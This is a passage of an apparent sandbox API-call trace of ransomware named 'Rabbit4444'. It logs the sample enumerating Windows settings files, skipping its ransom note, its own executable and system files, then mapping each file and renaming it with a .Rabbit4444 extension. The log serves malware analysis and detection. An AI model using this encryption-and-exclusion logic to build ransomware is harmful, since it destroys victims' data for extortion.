"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemshellmode.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.755] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904fc98, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x904fc98, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", cAlternateFileName="AA1248~1.SET")) returned 1 [0056.755] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.755] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.755] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.755] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2=".") returned 1 [0056.755] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2="..") returned 1 [0056.756] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2="windows") returned -1 [0056.756] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.756] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.756] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2="boot") returned -1 [0056.756] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.756] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.756] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms") returned="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms" [0056.756] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.756] lstrlenW (lpString="AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms") returned 52 [0056.756] lstrlenW (lpString="Rabbit4444") returned 10 [0056.756] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.756] lstrlenW (lpString=".dll") returned 4 [0056.756] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.756] lstrlenW (lpString=".lnk") returned 4 [0056.756] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.756] lstrlenW (lpString=".ini") returned 4 [0056.756] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.756] lstrlenW (lpString=".sys") returned 4 [0056.756] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.756] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacyaccountinfo.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.757] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.757] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14806734602) returned 1 [0056.757] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1097) returned 1 [0056.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0056.757] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.758] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.759] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14806981522) returned 1 [0056.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0056.759] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.759] CloseHandle (hObject=0x298) returned 1 [0056.759] CloseHandle (hObject=0x278) returned 1 [0056.759] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms.Rabbit4444") returned 180 [0056.759] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacyaccountinfo.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacyaccountinfo.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.760] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9180f47, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x9180f47, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", cAlternateFileName="AA017B~1.SET")) returned 1 [0056.760] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.760] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.760] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.760] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2=".") returned 1 [0056.760] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2="..") returned 1 [0056.760] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2="windows") returned -1 [0056.760] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.760] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.761] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2="boot") returned -1 [0056.761] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.761] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.761] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyCalendar.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyCalendar.settingcontent-ms") returned="AAA_SettingsPagePrivacyCalendar.settingcontent-ms" [0056.761] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCalendar.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.761] lstrlenW (lpString="AAA_SettingsPagePrivacyCalendar.settingcontent-ms") returned 49 [0056.761] lstrlenW (lpString="Rabbit4444") returned 10 [0056.761] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.761] lstrlenW (lpString=".dll") returned 4 [0056.761] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.761] lstrlenW (lpString=".lnk") returned 4 [0056.761] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.761] lstrlenW (lpString=".ini") returned 4 [0056.761] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.761] lstrlenW (lpString=".sys") returned 4 [0056.761] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.761] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCalendar.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycalendar.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.761] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.761] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14807226997) returned 1 [0056.762] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1082) returned 1 [0056.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0056.762] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.763] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.764] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14807495763) returned 1 [0056.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0056.764] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.764] CloseHandle (hObject=0x298) returned 1 [0056.764] CloseHandle (hObject=0x278) returned 1 [0056.765] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCalendar.settingcontent-ms.Rabbit4444") returned 177 [0056.765] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCalendar.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycalendar.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCalendar.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycalendar.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.765] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b2259, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x92b2259, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", cAlternateFileName="AA415E~1.SET")) returned 1 [0056.765] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.765] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.765] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.765] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2=".") returned 1 [0056.765] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2="..") returned 1 [0056.765] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2="windows") returned -1 [0056.766] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.766] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.766] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2="boot") returned -1 [0056.766] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.766] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.766] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms") returned="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms" [0056.766] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.766] lstrlenW (lpString="AAA_SettingsPagePrivacyCallHistory.settingcontent-ms") returned 52 [0056.766] lstrlenW (lpString="Rabbit4444") returned 10 [0056.766] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.766] lstrlenW (lpString=".dll") returned 4 [0056.767] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.767] lstrlenW (lpString=".lnk") returned 4 [0056.767] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.767] lstrlenW (lpString=".ini") returned 4 [0056.767] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.767] lstrlenW (lpString=".sys") returned 4 [0056.767] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.767] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycallhistory.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.767] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.767] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14807773469) returned 1 [0056.767] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1097) returned 1 [0056.767] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.767] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0056.767] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.768] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.770] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14808038265) returned 1 [0056.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0056.770] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.770] CloseHandle (hObject=0x298) returned 1 [0056.770] CloseHandle (hObject=0x278) returned 1 [0056.770] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms.Rabbit4444") returned 180 [0056.770] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycallhistory.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycallhistory.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.771] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x966bcb4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x966bcb4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyContacts.settingcontent-ms", cAlternateFileName="AA1DE6~1.SET")) returned 1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2=".") returned 1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2="..") returned 1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2="windows") returned -1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2="boot") returned -1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.771] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.771] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyContacts.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyContacts.settingcontent-ms") returned="AAA_SettingsPagePrivacyContacts.settingcontent-ms" [0056.771] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyContacts.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.771] lstrlenW (lpString="AAA_SettingsPagePrivacyContacts.settingcontent-ms") returned 49 [0056.771] lstrlenW (lpString="Rabbit4444") returned 10 [0056.771] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.771] lstrlenW (lpString=".dll") returned 4 [0056.771] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.771] lstrlenW (lpString=".lnk") returned 4 [0056.771] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.771] lstrlenW (lpString=".ini") returned 4 [0056.772] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.772] lstrlenW (lpString=".sys") returned 4 [0056.772] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.772] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyContacts.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycontacts.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.772] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.772] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14808262058) returned 1 [0056.772] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1082) returned 1 [0056.772] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.772] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0056.772] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.773] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, 